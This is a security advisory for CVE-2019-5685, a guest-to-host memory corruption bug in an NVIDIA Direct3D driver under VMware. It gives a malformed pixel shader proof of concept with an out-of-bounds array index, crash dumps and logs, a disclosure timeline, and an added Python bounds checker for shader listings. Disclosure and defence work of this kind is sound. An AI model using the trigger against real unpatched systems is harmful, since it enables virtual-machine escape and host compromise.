CVE-2019-5685
An exploitable memory corruption vulnerability exists in the NVIDIA NVWGF2UMX_CFG driver, versions 25.21.14.2531 and 425.31. A specially crafted pixel shader can cause an untrusted pointer dereference. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability can be triggered from a VMware guest, affecting the VMware host.
NVWGF2UMX_CFG.DLL (version 25.21.14.2531), NVIDIA D3D10 Driver, Version 425.31 on NVIDIA Quadro K620
VMware Workstation 15 (15.0.4 build-12990004) with Windows 10 x64 as guestVM
http://nvidia.com http://vmware.com
9.0 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
CWE-822: Untrusted Pointer Dereference
This vulnerability can be triggered by supplying a malformed pixel shader (inside the VMware guest OS) to the NVIDIA NVWGF2UMX_CFG.DLL driver. Such an attack can be triggered from VMware guest user mode to cause an untrusted pointer dereference (potential memory corruption) in the vmware-vmx.exe process on the host, or theoretically through WebGL (remote website).
Example of malformed pixel shader:
ps_4_0
dcl_constantbuffer cb0[3], immediateIndexed
dcl_indexableTemp x1[65], 4
mov r17.xyz, v0.xyzw
div r17.w, l(1.000000, 1.000000, 1.000000, 1.000000), v0.xyzw
mov r0.xyzw, r17.xyzw
mad r0.y, r17.xyzw, cb0[2].xxxx, cb0[2].yyyy
mov x1[0].x, l(0,0,0,0)
mov x1[1].x, l(1,1,1,1)
mov x1[2].x, l(1,1,1,1)
mov x1[3].x, l(1,1,1,1)
mov x1[4].x, l(0,0,0,0)
mov x1[5].x, l(0,0,0,0)
mov x1[6].x, l(1,1,1,1)
mov x1[7].x, l(0,0,0,0)
mov x1[8].x, l(0,0,0,0)
mov x1[9].x, l(1,1,1,1)
mov x1[10].x, l(0,0,0,0)
mov x1[11].x, l(1,1,1,1)
mov x1[12].x, l(0,0,0,0)
mov x1[13].x, l(0,0,0,0)
mov x1[14].x, l(1,1,1,1)
mov x1[39385].x, l(0,0,0,0)
...
The DCL_INDEXABLETEMP function declares an indexable, temporary register (in this case 65 is the number of elements in the register array, and 4 is the number of components in the register array).
By modifying the shader bytecode of the MOV X1[X] instruction (particularly, changing the index of the array to be larger than 65) it is possible to cause an untrusted pointer dereference in NVIDIA’s NVWGF2UMX_CFG.DLL driver.
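The consistency rule this bug depends on (every x#[i] access must stay inside its dcl_indexableTemp declaration) can be checked over a shader disassembly before it reaches a driver. The following is an added example, not code from the advisory or from NVIDIA or VMware; the function and class names are hypothetical, and the input is an excerpt of the listing above.

```python
import re
from dataclasses import dataclass
from typing import Optional

# dcl_indexableTemp x<reg>[<elements>], <components>
DCL_RE = re.compile(r"^\s*dcl_indexableTemp\s+x(\d+)\[(\d+)\]\s*,\s*(\d+)", re.I)
# Any x<reg>[<index expression>] operand on an instruction line.
USE_RE = re.compile(r"\bx(\d+)\[([^\]]+)\]")


@dataclass
class Finding:
    line: int                 # 1-based line number in the listing
    register: str             # e.g. "x1"
    index: Optional[int]      # None when the index is computed at run time
    declared: Optional[int]   # declared element count, None if undeclared
    kind: str                 # "out_of_bounds", "dynamic" or "undeclared"


def check_indexable_temps(asm: str) -> list:
    """Flag indexable-temp accesses that are not provably inside the declaration."""
    declared = {}
    findings = []
    for lineno, text in enumerate(asm.splitlines(), start=1):
        text = text.split("//", 1)[0]          # drop disassembler comments
        dcl = DCL_RE.match(text)
        if dcl:
            declared[int(dcl.group(1))] = int(dcl.group(2))
            continue
        for use in USE_RE.finditer(text):
            reg, expr = int(use.group(1)), use.group(2).strip()
            name, size = f"x{reg}", declared.get(reg)
            idx = int(expr) if expr.isdigit() else None
            if size is None:
                findings.append(Finding(lineno, name, idx, None, "undeclared"))
            elif idx is None:
                # Relative addressing (x0[r1.x + 0]) cannot be bounded
                # statically; it needs a run-time clamp in the consumer.
                findings.append(Finding(lineno, name, None, size, "dynamic"))
            elif idx >= size:
                findings.append(Finding(lineno, name, idx, size, "out_of_bounds"))
    return findings


# Excerpt of the shader listing shown on this page.
PAGE_EXCERPT = """\
ps_4_0
dcl_constantbuffer cb0[3], immediateIndexed
dcl_indexableTemp x1[65], 4
mov x1[0].x, l(0,0,0,0)
mov x1[14].x, l(1,1,1,1)
mov x1[39385].x, l(0,0,0,0)
"""

if __name__ == "__main__":
    for f in check_indexable_temps(PAGE_EXCERPT):
        print(f)
```

The check works on the text disassembly; a fuzzing or ingestion pipeline that handles raw bytecode would disassemble first, then run the same comparison.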
(vmware release mode crash dump fragment):
0:015> .ecxr
rax=0000000000000000 rbx=0000021fa6627bc0 rcx=0000025fa668a150
rdx=0000000000000002 rsi=0000000000000000 rdi=0000021fa6625600
rip=00007ffdca904d0b rsp=0000001f15efb740 rbp=0000001f15efb840
r8=00007ffdca610000 r9=000000003fea6842 r10=00000000000000e4
r11=0000000000000084 r12=0000000000040300 r13=0000000000000001
r14=0000021fa677d920 r15=0000021fa67e3910
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
nvwgf2umx_cfg!OpenAdapter12+0x17b66b:
00007ffd`ca904d0b 488901 mov qword ptr [rcx],rax ds:0000025f`a668a150=????????????????
stack trace:
0:015> kb
*** Stack trace for last set context - .thread/.cxr resets it
# RetAddr : Args to Child : Call Site
00 00007ffd`ca79dfb1 : 0000021f`a677d920 00007ffd`cb315bc0 0000021f`a677d920 0000021f`a5fe98c0 : nvwgf2umx_cfg!OpenAdapter12+0x17b66b
01 00007ffd`ca79e7a8 : 00007ffd`ca7870b0 0000021f`a63ad330 00007ffd`ca7870b0 0000021f`a656ded0 : nvwgf2umx_cfg!OpenAdapter12+0x14911
02 00007ffd`ca79f906 : 0000021f`a62af948 0000001f`15efbae9 00000000`84000185 00007ffd`d936d997 : nvwgf2umx_cfg!OpenAdapter12+0x15108
03 00007ffd`ca99a9d9 : 0000021f`a62af948 0000021f`a5ff7c80 0000001f`15efbdf0 00000000`00000110 : nvwgf2umx_cfg!OpenAdapter12+0x16266
04 00007ffd`cb4c0d61 : 0000021f`00000000 00000000`000013c8 0000021f`a62af948 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x211339
05 00007ffd`cb4baaa7 : 0000021f`a62af948 00000000`00000000 0000021f`a5e1a260 00000000`00000000 : nvwgf2umx_cfg!NVAPI_Thunk+0x347461
06 00007ffd`d279b11d : 00000000`00000000 0000001f`15efc5d0 0000021f`a62af938 0000021f`a5e0dc70 : nvwgf2umx_cfg!NVAPI_Thunk+0x3411a7
07 00007ffd`d2794eab : 0000021f`a67cf96c 0000021f`a5e0dc70 0000021f`a62af938 00000000`00000000 : d3d11!CPixelShader::CLS::FinalConstruct+0x219
08 00007ffd`d2794dc3 : 0000001f`15efe140 00007ffd`d2973b10 0000021f`a62af7e0 00000000`00000000 : d3d11!CLayeredObjectWithCLS<CPixelShader>::FinalConstruct+0xa3
09 00007ffd`d27a7665 : 0000021f`a62af830 0000001f`15efe140 0000001f`15efe170 00007ffd`d2973b10 : d3d11!CLayeredObjectWithCLS<CPixelShader>::CreateInstance+0x14b
0a 00007ffd`d27acac6 : 00000000`00000000 00000000`00000030 00000000`00000000 00000000`00000030 : d3d11!CDevice::CreateLayeredChild+0x975
0b 00007ffd`d27ad3c0 : 0000021f`a62af7e0 0000021f`a64e3f28 00007ffd`d29730e8 00000000`00000030 : d3d11!NDXGI::CDevice::CreateLayeredChild+0x266
0c 00007ffd`d278ca83 : 0000021f`a5fc65d0 0000021f`00000009 0000021f`a5fc6e08 00007ffd`d278aa43 : d3d11!NOutermost::CDevice::CreateLayeredChild+0x1b0
0d 00007ffd`d278a976 : 0000021f`a67cf8d0 00000000`0000b000 0000001f`15efe569 00000000`00000000 : d3d11!CDevice::CreateAndRecreateLayeredChild<SD3D11LayeredPixelShaderCreationArgs>+0x5f
0e 00007ffd`d278a768 : 0000021f`a5fc6e08 0000021f`a67cf8d0 00000000`00001424 00000000`00000000 : d3d11!CDevice::CreatePixelShader_Worker+0x202
0f 00007ff7`33968802 : 0000021f`a67c5060 00007ff7`336b0000 00007ff7`336b0000 0000021e`203e0600 : d3d11!CDevice::CreatePixelShader+0x28
10 00007ff7`3396a0e5 : 0000021f`a67c5060 00007ff7`336b0000 00007ff7`336b0000 0000021f`a5fc6628 : vmware_vmx+0x2b8802
11 00007ff7`33968f62 : 0000021f`a67ccfe0 00007ff7`336b0000 0000021f`a67c5060 0000021f`a67c5060 : vmware_vmx+0x2ba0e5
12 00007ff7`33965451 : 00000000`fffe4000 0000021f`a67c5060 00000000`00000003 0000021f`a667a4d0 : vmware_vmx+0x2b8f62
13 00007ff7`338beec9 : 00007ff7`338bee00 0000021f`a667a4c0 00000000`00000028 00007ff7`339a3e50 : vmware_vmx+0x2b5451
14 00007ff7`338529d2 : 00000000`00000040 00007ff7`338bee00 0000001f`15eff810 00000000`00000028 : vmware_vmx+0x20eec9
15 00007ff7`33850a9f : 0000001f`15eff930 00000000`00000040 00000000`00000000 00000000`00000001 : vmware_vmx+0x1a29d2
16 00007ff7`337a65a0 : 0000021e`203e0600 0000021e`203e06e0 00000000`00000001 00000000`00000000 : vmware_vmx+0x1a0a9f
17 00007ff7`33ccc7b0 : 00007ff7`337a6480 00000000`00000000 00000000`00000000 00000000`00000000 : vmware_vmx+0xf65a0
18 00007ffd`d6bc7974 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : vmware_vmx+0x61c7b0
19 00007ffd`d93ca271 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0x14
1a 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
From vmware-vmx.exe (this is not a windbg crash dump):
2019-04-16T12:12:57.186+02:00| svga| W115: ----Win32 exception detected, exceptionCode 0xc0000005 (access violation)----
2019-04-16T12:12:57.186+02:00| svga| W115: ExceptionAddress 0x7ffdca904d0b eflags 0x00010246
2019-04-16T12:12:57.186+02:00| svga| W115: rwFlags 0x1 badAddr 0x25fa668a150
2019-04-16T12:12:57.187+02:00| svga| W115: rax 0 rbx 0x21fa6627bc0 rcx 0x25fa668a150
2019-04-16T12:12:57.187+02:00| svga| W115: rdx 0 rsi 0 rdi 0x21fa6625600
2019-04-16T12:12:57.187+02:00| svga| W115: r8 0x7ffdca610000 r9 0x3fea6842 r10 0xe4
2019-04-16T12:12:57.187+02:00| svga| W115: r11 0x84 r12 0x40300 r13 0x1
2019-04-16T12:12:57.187+02:00| svga| W115: r14 0x21fa677d920 r15 0x21fa67e3910
2019-04-16T12:12:57.187+02:00| svga| W115: rip 0x7ffdca904d0b rsp 0x1f15efb740 rbp 0x1f15efb840
2019-04-16T12:12:57.187+02:00| svga| W115: LastBranchToRip 0 LastBranchFromRip 0
2019-04-16T12:12:57.187+02:00| svga| W115: LastExceptionToRip 0 LastExceptionFromRip 0
2019-04-16T12:12:57.187+02:00| svga| W115: The following data was delivered with the exception:
2019-04-16T12:12:57.187+02:00| svga| W115: -- 0x1
2019-04-16T12:12:57.187+02:00| svga| W115: -- 0x25fa668a150
2019-04-16T12:12:57.187+02:00| svga| I125: CoreDump: Minidump file K:\vmware_images\windows_10_x64_uefi\vmware-vmx.dmp exists. Rotating ...
2019-04-16T12:12:57.191+02:00| svga| W115: CoreDump: Writing minidump to K:\vmware_images\windows_10_x64_uefi\vmware-vmx.dmp
2019-04-16T12:12:57.384+02:00| svga| I125: image file C:\Windows\System32\mscms.dll
2019-04-16T12:12:57.384+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.384+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd5290000 size 0x0x00028000
2019-04-16T12:12:57.384+02:00| svga| I125: checksum 0x0002961f timestamp 0xbbcbf3a2
2019-04-16T12:12:57.384+02:00| svga| I125: image file C:\Windows\System32\userenv.dll
2019-04-16T12:12:57.384+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.384+02:00| svga| I125: CoreDump: including module base 0x0x7ffdcde10000 size 0x0x00010000
2019-04-16T12:12:57.384+02:00| svga| I125: checksum 0x0000eeb8 timestamp 0xb5672678
2019-04-16T12:12:57.384+02:00| svga| I125: image file C:\Windows\System32\ColorAdapterClient.dll
2019-04-16T12:12:57.384+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.384+02:00| svga| I125: CoreDump: including module base 0x0x7ffdb4950000 size 0x0x00043000
2019-04-16T12:12:57.384+02:00| svga| I125: checksum 0x0004a1f9 timestamp 0xa5d2ba3f
2019-04-16T12:12:57.384+02:00| svga| I125: image file C:\Windows\System32\icm32.dll
2019-04-16T12:12:57.384+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.384+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd2770000 size 0x0x0027e000
2019-04-16T12:12:57.384+02:00| svga| I125: checksum 0x0028c849 timestamp 0x13a31007
2019-04-16T12:12:57.384+02:00| svga| I125: image file C:\Windows\System32\d3d11.dll
2019-04-16T12:12:57.384+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.384+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd40e0000 size 0x0x000c2000
2019-04-16T12:12:57.384+02:00| svga| I125: checksum 0x000c506d timestamp 0x6b3e2414
2019-04-16T12:12:57.384+02:00| svga| I125: image file C:\Windows\System32\dxgi.dll
2019-04-16T12:12:57.384+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.384+02:00| svga| I125: CoreDump: including module base 0x0x7ffdcf690000 size 0x0x000ee000
2019-04-16T12:12:57.384+02:00| svga| I125: checksum 0x000ef76f timestamp 0x5cac804c
2019-04-16T12:12:57.384+02:00| svga| I125: image file C:\Windows\System32\DriverStore\FileRepository\nv_dispwi.inf_amd64_b299c2f3f9b29d45\nvldumdx.dll
2019-04-16T12:12:57.384+02:00| svga| I125: file version 25.21.14.2531
2019-04-16T12:12:57.384+02:00| svga| I125: CoreDump: including module base 0x0x7ffdca610000 size 0x0x025b5000
2019-04-16T12:12:57.384+02:00| svga| I125: checksum 0x025b9b1a timestamp 0x5cac87c1
2019-04-16T12:12:57.385+02:00| svga| I125: image file C:\Windows\System32\DriverStore\FileRepository\nv_dispwi.inf_amd64_b299c2f3f9b29d45\nvwgf2umx_cfg.dll
2019-04-16T12:12:57.385+02:00| svga| I125: file version 25.21.14.2531
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: including module base 0x0x7ffdbe240000 size 0x0x0002a000
2019-04-16T12:12:57.385+02:00| svga| I125: checksum 0x0003488c timestamp 0x590c013e
2019-04-16T12:12:57.385+02:00| svga| I125: image file C:\Windows\System32\dbgcore.dll
2019-04-16T12:12:57.385+02:00| svga| I125: file version 10.0.17763.1
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 11992
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 12052
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 8708
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 10080
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 9268
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 15336
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 12324
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 15232
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 14148
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 10664
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 12840
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 15136
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 11244
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 4364
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 4192
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 14008
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 12424
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 4444
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 8984
2019-04-16T12:12:57.385+02:00| svga| I125: CoreDump: Including thread 14772
2019-04-29 - Vendor Disclosure
2019-08-02 - Vendor Patched; Public Release
Discovered by Piotr Bania of Cisco Talos.